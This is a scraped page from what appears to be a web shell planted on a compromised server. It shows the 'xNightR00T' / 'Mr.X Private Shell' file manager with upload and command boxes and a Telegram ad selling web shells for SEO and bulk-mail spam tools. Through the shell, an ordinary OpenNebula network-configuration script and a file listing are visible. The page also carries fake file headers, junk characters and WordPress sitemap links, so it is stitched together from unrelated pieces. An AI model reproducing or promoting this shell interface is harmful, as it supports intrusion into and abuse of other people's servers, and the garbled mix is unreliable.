xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
#!/usr/bin/env bash

# -------------------------------------------------------------------------- #
# Copyright 2002-2020, OpenNebula Project, OpenNebula Systems                #
#                                                                            #
# Licensed under the Apache License, Version 2.0 (the "License"); you may    #
# not use this file except in compliance with the License. You may obtain    #
# a copy of the License at                                                   #
#                                                                            #
# http://www.apache.org/licenses/LICENSE-2.0                                 #
#                                                                            #
# Unless required by applicable law or agreed to in writing, software        #
# distributed under the License is distributed on an "AS IS" BASIS,          #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.   #
# See the License for the specific language governing permissions and        #
# limitations under the License.                                             #
#--------------------------------------------------------------------------- #

get_iface_var()
{
    var_name="${UPCASE_DEV}_$1"
    var=$(eval "echo \"\${$var_name}\"")

    echo $var
}

get_pci_interfaces()
{
    env | grep -E "^PCI[0-9]+_MAC=" | sed 's/_.*$//' | sort
}

get_dev_from_pci()
{
    DEV=$(find /sys/class/net/*/device -lname "*$1" 2>/dev/null | awk -F '/' '{print $5}')

    if [ -z "$DEV" ]; then
        echo "PCI Device $1 not found" >&2
        return
    fi

    if [ `echo "$DEV" | wc -l` -gt 1 ]; then
        echo "More than one PCI Device $1 found" >&2
        return
    fi

    echo "$DEV"
}

PCI_INTERFACES=$(get_pci_interfaces)

for pci in $PCI_INTERFACES; do
    UPCASE_DEV=$pci

    IP=$(get_iface_var "IP")
    MAC=$(get_iface_var "MAC")
    MASK=$(get_iface_var "MASK")
    MASK=${MASK:-255.255.255.0}
    GATEWAY=$(get_iface_var "GATEWAY")
    METRIC=$(get_iface_var "METRIC")
    MTU=$(get_iface_var "MTU")
    MTU=${MTU:-1500}
    VLAN_ID=$(get_iface_var "VLAN_ID")

    IP6=$(get_iface_var "IP6")
    IP6_PREFIX_LENGTH=$(get_iface_var "IP6_PREFIX_LENGTH")
    IP6_PREFIX_LENGTH=${IP6_PREFIX_LENGTH:-64}
    IP6_ULA=$(get_iface_var "IP6_ULA")
    GATEWAY6=$(get_iface_var "GATEWAY6")

    ADDRESS=$(get_iface_var "ADDRESS")
    [ -z "$ADDRESS" ] && continue

    DEV=$(get_dev_from_pci "$ADDRESS")
    [ -z "$DEV" ] && continue

    # MAC
    ip link set dev $DEV address $MAC
    ip link set dev $DEV up

    # MTU
    if [ -n "$MTU" ]; then
        ip link set dev $DEV mtu $MTU
    fi

    # VLAN (802.1Q)
    if [ -n "$VLAN_ID" ]; then
        ip link add link $DEV name $DEV.$VLAN_ID type vlan id $VLAN_ID
        ip link set dev $DEV.$VLAN_ID up
        DEV=$DEV.$VLAN_ID
    fi

    # IPv4
    if [ -n "$IP" ]; then
        ip address add $IP/$MASK dev $DEV

        if [ -n "$GATEWAY" ]; then
            ip route add default via $GATEWAY dev $DEV ${METRIC:+metric ${METRIC}}
        fi
    fi

    # IPv6
    if [ -n "$IP6" ]; then
        ip -6 address add $IP6/$IP6_PREFIX_LENGTH dev $DEV

        if [ -n "$IP6_ULA" ]; then
            ip -6 address add $IP6_ULA/64 dev $DEV
        fi

        if [ -n "$GATEWAY6" ]; then
            ip -6 route add default via $GATEWAY6 dev $DEV
        fi
    fi
done

Filemanager

Name Type Size Permission Actions
loc-05-grow-rootfs File 3.18 KB 0755
loc-09-timezone File 1.72 KB 0755
loc-10-network File 8.26 KB 0755
loc-10-network-pci File 3.3 KB 0755
loc-11-dns File 2.32 KB 0755
loc-14-mount-swap File 1.45 KB 0755
loc-16-gen-env File 1.95 KB 0755
loc-20-set-username-password File 3.62 KB 0755
loc-22-ssh_public_key File 2.11 KB 0755
loc-30-console File 1.31 KB 0755
loc-35-securetty File 2.05 KB 0755
net-15-hostname File 5.41 KB 0755
net-97-start-script File 1.69 KB 0755
net-98-execute-scripts File 1.52 KB 0755
net-99-report-ready File 2.07 KB 0755
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml